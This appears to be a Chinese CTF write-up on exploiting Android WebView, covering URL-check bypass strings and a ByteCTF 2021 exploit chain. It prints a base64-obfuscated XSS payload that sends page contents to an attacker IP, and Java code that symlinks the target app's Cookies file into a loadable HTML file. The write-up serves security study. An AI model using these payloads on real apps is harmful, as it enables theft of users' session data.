本文主要讲解Android-WebView中的一个漏洞点,从介绍WebView到成功利用。通过复现ByteCtf2021中的一道漏洞题来对知识进行巩固。
//方式一:加载一个网页
webView.loadUrl("http://www.baidu.com");
//方式二:加载应用资源文件内的网页
webView.loadUrl("file:///data/local/tmp/xx.html");
//方式三:加载一段代码
webView.loadData(String data,String mimeType, String encoding);
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
data = Uri.parse("http://www.baidu.com");
WebView webView = new WebView(getApplicationContext());
setContentView(webView);
webView.getSettings().setJavaScriptEnabled(true);
webView.loadUrl(data.toString());
}
记得添加网络权限: <uses-permission android:name="android.permission.INTERNET"/>
URL的一般格式为:
<scheme>://<user>:<password>@<host>:<port>/<path>:<params>?<query>#<frag>
String uri = "https://www.baidu.com/
Uri mUri = Uri.parse(uri);
// 协议
String scheme = mUri.getScheme();
// 域名+端口号+路径+参数
String scheme_specific_part = mUri.getSchemeSpecificPart();
// 用户信息+域名+端口号
String authority = mUri.getAuthority();
// fragment
String fragment = mUri.getFragment();
// 域名
String host = mUri.getHost();
// 端口号
int port = mUri.getPort();
// 路径
String path = mUri.getPath();
// 参数
String query = mUri.getQuery();
一、
if(!url.startsWith("http://")){
webView.loadUrl(url);
}
大小写绕过:Http
前面加空格绕过:http
二、
if(url.contains("baidu")){
webView.loadUrl(url);
}
#绕过:http://www.google.com#baidu
?绕过:http://www.google.com?baidu
三、
if(Uri.parse(url).getAuthority().contains("baidu"){
webView.loadUrl(url);
}
绕过:http://[email protected]
四、
if(Uri.parse(url).getHost().endsWith("baidu.com")){
webView.loadUrl(url);
}
if(Uri.parse(url).getHost().contains("baidu.com")) {
webView.loadUrl(url);
}
申请域名绕过:http://xxxxxbaidu.com
<user>:<password>@<host>:<port>
这一部分,如果网站没有user,password的校验,则这一部分会被忽略,写与不写不影响网站访问。所以我们将校验的关键词写在这一部分就可以绕过了。Uri data = Uri.parse("http://192.168.43.164/exp.html");
WebView webView = new WebView(getApplicationContext());
setContentView(webView);
webView.getSettings().setJavaScriptEnabled(true);
webView.loadUrl(data.toString());
<img src="x" onerror="eval(atob('bmV3IEltYWdlKCkuc3JjID0gImh0dHA6Ly8xOTIuMTY4LjQzLjE2NDo4MC8/Y29va2llPSIgKyBlbmNvZGVVUklDb21wb25lbnQoZG9jdW1lbnQuZ2V0RWxlbWVudHNCeVRhZ05hbWUoImh0bWwiKVswXS5pbm5lckhUTUwpOw=='))">
base64解码后为:
new Image().src = "http://192.168.43.164:80/?cookie=" + encodeURIComponent(document.getElementsByTagName("html")[0].innerHTML);
1. 如何将这段代码插入到Cookies中?
1. 这段代码在Cookies文件中是不会执行的,如何让这段xss执行?
上面我们介绍了通过xss来窃取Cookies,并提出了两个问题,现在我们就是要解决这两个问题。
1.如何将这段代码插入到Cookies中?
我们知道可以通过document.cookie = "xxxxxxx"来设置cookie,而这cookie的值会被存放到Cookies文件中,所以我们可以通过这样的方式将我们的攻击代码插入到Cookies文件中。
document.cookie = "x = '<img src="x" onerror="eval(atob('bmV3IEltYWdlKCkuc3JjID0gImh0dHA6Ly8xOTIuMTY4LjQzLjE2NDo4MC8/Y29va2llPSIgKyBlbmNvZGVVUklDb21wb25lbnQoZG9jdW1lbnQuZ2V0RWxlbWVudHNCeVRhZ05hbWUoImh0bWwiKVswXS5pbm5lckhUTUwpOw=='))">'"
2.这段代码在Cookies文件中是不会执行的,如何让这段xss执行?
JS代码在html文件中会执行,所以我们要想办法将Cookies中的内容存放到一个html文件中。这里采用的是符号链接的方式,谷歌官方提出修复方法时已经给出了思路(https://support.google.com/faqs/answer/9084685),所以我们可以将Cookies文件与一个html文件进行符号链接。
建立一个easydroid.html,它里面有两个重定向:一个是设置Cookie,一个是加载与Cookies文件符号链接后的那个html文件。
在shouldOverrideUrlLoading中,重定向时会通过parseUri解析intent,这里利用了Android-Intent重定向的知识,在之前的文章中已经进行了学习(https://www.freebuf.com/articles/web/325314.html)。toUri与parseUri正好相反,可以使用toUri来得到攻击代码。
通过重定向进入到了TestActivity中,然后获取数据,使用loadUrl加载。
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_main);
symlink();
Intent intent = new Intent();
intent.setClassName("com.bytectf.easydroid","com.bytectf.easydroid.MainActivity");
intent.setData(Uri.parse("http://[email protected]/easydroid.html"));
startActivity(intent);
}
private String symlink() {
try {
String root = getApplicationInfo().dataDir;
String symlink = root + "/symlink.html";
String cookies = getPackageManager().getApplicationInfo("com.bytectf.easydroid", 0).dataDir + "/app_webview/Cookies";
Runtime.getRuntime().exec("rm " + symlink).waitFor();
Runtime.getRuntime().exec("ln -s " + cookies + " " + symlink).waitFor();
Runtime.getRuntime().exec("chmod -R 777 " + root).waitFor();
return symlink;
} catch (Throwable th) {
throw new RuntimeException(th);
}
}
http://192.168.43.164/easydroid.html
:参考
https://shvu8e0g7u.feishu.cn/docs/doccndYygIwisrk0FGKnKvE0Jhg
https://www.cnblogs.com/rebeyond/p/10916076.html
https://support.google.com/faqs/answer/9084685
https://blog.csdn.net/zxc024000/article/details/90298159
https://www.runoob.com/w3cnote/android-tutorial-webview.html
原文始发于微信公众号(山石网科安全技术研究院):Android-Webview中的漏洞利用总结